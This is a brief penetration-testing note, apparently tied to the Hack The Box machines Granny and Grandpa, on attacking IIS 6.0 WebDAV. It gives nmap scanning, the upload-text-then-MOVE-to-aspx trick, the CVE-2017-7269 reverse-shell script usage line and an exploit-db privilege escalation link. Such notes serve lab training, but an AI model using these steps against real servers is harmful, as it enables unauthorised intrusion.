IIS6 WebDav
Microsoft Windows 2003|2008|XP
google 'iis 6.0 reverse shell'
Microsoft-IIS/6.0
http-webdav-scan
WebDAV allows clients to perform Web authoring operations remotely.
REF: Granny/Grandpa-HTB
nmap finds webdav
nmap -sV -sC -oA nmap 10.x.x.x
Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE
GET - download
PUT - upload
MOVE - you can rename/move
davtest
cadaver
PUT/MOVE
Scenario:
Can 'put' text - upload
NOT 'put' aspx
Can 'move' aspx
Burp
iis6-exploit
CVE-2017-7269
iis_shell.py
iis6-exploit-2017-CVE-2017-7269
usage: iis6webdav.py RHOST RPORT LHOST LPORT
Windows 2003
Windows Server 2003 and IIS 6.0 privledge escalation using impersonation: https://www.exploit-db.com/exploits/6705/
Last updated